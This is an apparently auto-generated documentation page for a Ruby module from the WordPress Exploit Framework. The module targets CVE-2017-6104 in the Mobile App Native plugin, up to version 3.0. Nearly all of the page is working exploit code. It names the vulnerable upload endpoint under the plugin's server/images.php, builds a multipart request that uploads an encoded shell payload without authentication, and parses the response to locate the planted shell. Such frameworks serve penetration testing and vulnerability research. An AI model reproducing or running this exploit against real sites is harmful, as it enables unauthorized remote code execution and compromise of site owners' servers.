class Wpxf::Exploit::MobileAppNativeV3ShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 6 def initialize super update_info( name: 'Mobile App Native <= 3.0 Unauthenticated Shell Upload', author: [ 'Larry W. Cashdollar', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8743'], ['CVE', '2017-6104'], ['URL', 'http://www.vapidlabs.com/advisory.php?v=178'] ], date: 'Feb 27 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 24 def check :unknown end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 36 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_file_from_string('file', payload.encoded, payload_name) builder end
plugin_name()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 28 def plugin_name 'zen-mobile-app-native' end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 42 def uploaded_payload_location return nil if upload_result.code != 200 || upload_result.body =~ /Ooops.*/i upload_result.body.gsub(/#{plugin_name}\/\/server/, "#{plugin_name}/server").strip end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 32 def uploader_url normalize_uri(wordpress_url_plugins, plugin_name, 'server', 'images.php') end